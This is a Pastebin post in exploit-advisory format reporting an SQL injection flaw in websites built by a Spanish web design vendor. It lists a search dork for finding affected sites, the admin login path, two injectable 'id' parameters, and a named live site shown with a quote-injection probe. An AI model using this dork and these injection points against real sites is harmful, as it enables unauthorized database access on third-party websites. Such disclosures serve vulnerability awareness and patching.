KingSkrupellos

Desarrollado por C-Diseño Web Design Spain SQL Injection

Jan 14th, 2019
74
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.42 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Desarrollado por C-Diseño Web Design Spain SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 15/01/2019
  7. # Vendor Homepage : cdiseno.es
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:''Desarrollado por C-Diseño''
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14.  
  15. ####################################################################
  16.  
  17. # Admin Panel Login Path :
  18. *************************
  19. /admin.php
  20.  
  21. # SQL Injection Exploit :
  22. ***********************
  23.  
  24. /index.php?id=[SQL Injection]
  25.  
  26. /noticias.php?id=[SQL Injection]
  27.  
  28. ####################################################################
  29.  
  30. # Example Vulnerable Site :
  31. *************************
  32.  
  33. [+] conurucanarias.es/index.php?id=58'
  34.  
  35. ####################################################################
  36.  
  37. # SQL Database Error :
  38. **********************
  39. Ha ocurrido un error inesperado con la Base de Datos, intentelo de nuevo.
  40.  
  41. An unexpected error occurred with the Database, try again.
  42.  
  43. ####################################################################
  44.  
  45. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  46.  
  47. ####################################################################
Add Comment
Please, Sign In to add comment